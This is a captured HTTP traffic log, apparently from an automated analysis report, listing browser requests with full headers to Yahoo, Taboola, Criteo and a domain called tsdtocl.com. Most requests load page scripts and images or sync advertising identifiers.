Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tsdtocl.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66bae12e060a4a66536126f26e6cf8 HTTP/1.1Host: api.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /sync?c=72&r=2&j=TRC.getRTUS&us_privacy=1YNN&gdpr=0&gdpr_consent=&gdpr_pd= HTTP/1.1Host: gum.criteo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-stream.custom.modern.1ed4fe71b1fc647ddbf37a7050944309.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/opus-frame.html?referrer=https%3A%2F%2Fwww.yahoo.com%2F&tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383&axids=gam%3Dy-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A%26dv360%3DeS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B%26ydsp%3Dy-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A%26tbla%3Dy-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN&reset_idsync=1 HTTP/1.1Host: opus.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC="19cw~2kzt:19e0~2kzt:19ea~2kzt"; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-sticky-1.2.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/c/755f6a7.caas-news_web.min.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-form-1.34.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-native-da-1.0.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/Lg5WgrqEEIfUVDSR.3ISjQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_news_641/e0e4d3ffc4cc8cc7accd7efa9f2d137d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-action-1.8.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-menu-1.3.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/f3GRHZeRABNpJiPbHs4McA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/wwd_409/a6afc674d9b56b0fa8f0f824d671500c.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-template-1.4.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/W7BlkVb3JweZnQNoIkHchA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/miami_herald_mcclatchy_975/6cc52b158992fe8218d9d85b25491d91.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/impl.20240929-12-RELEASE.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /yahooweb-network/load.js HTTP/1.1Host: pm-widget.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /scripts/eid.es5.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync?c=72&r=2&j=TRC.getRTUS&us_privacy=1YNN&gdpr=0&gdpr_consent=&gdpr_pd= HTTP/1.1Host: gum.criteo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ups/58746/sync?ui=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383&redir=true&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; IDSYNC=19ac~2kzt:19aj~2kzt:19bn~2kzt:19bu~2kzt:19cu~2kzt:19cw~2kzt:19e0~2kzt:19ea~2kzt
Source: global trafficHTTP traffic detected: GET /ups/58739/cms?partner_id=BLKAI&orig=ono HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; IDSYNC=19ac~2kzt:19aj~2kzt:19bn~2kzt:19bu~2kzt:19cu~2kzt:19cw~2kzt:19e0~2kzt:19ea~2kzt
Source: global trafficHTTP traffic detected: GET /ups/58782/cms?partner_id=ADOBE&orig=ono&redir2=true HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; IDSYNC=19ac~2kzt:19aj~2kzt:19bn~2kzt:19bu~2kzt:19cu~2kzt:19cw~2kzt:19e0~2kzt:19ea~2kzt
Source: global trafficHTTP traffic detected: GET /ups/58692/cms?partner_id=NEUAR&orig=ono HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; IDSYNC=19ac~2kzt:19aj~2kzt:19bn~2kzt:19bu~2kzt:19cu~2kzt:19cw~2kzt:19e0~2kzt:19ea~2kzt
Source: global trafficHTTP traffic detected: GET /ups/58699/cms?partner_id=SEMAS&orig=ono&sInitiator=external HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; IDSYNC=19ac~2kzt:19aj~2kzt:19bn~2kzt:19bu~2kzt:19cu~2kzt:19cw~2kzt:19e0~2kzt:19ea~2kzt
Source: global trafficHTTP traffic detected: GET /aaq/notifications/js/sh-5.17.91.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/hc/homepage-pwa-defer-1.1.6.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-stream.custom.modern.1ed4fe71b1fc647ddbf37a7050944309.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-sticky-1.2.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sg/yahoo_axid--yahoo_paxid/1/um/?axid=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A&paxid=&gdpr=0&gpp_sid=-1&gpp=DBAA&ui=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383&us_privacy=1YNN HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: t_pid=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /scripts/eid.es5.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /pv/static/img/voiceSearch1x-1620383531565.min.png HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
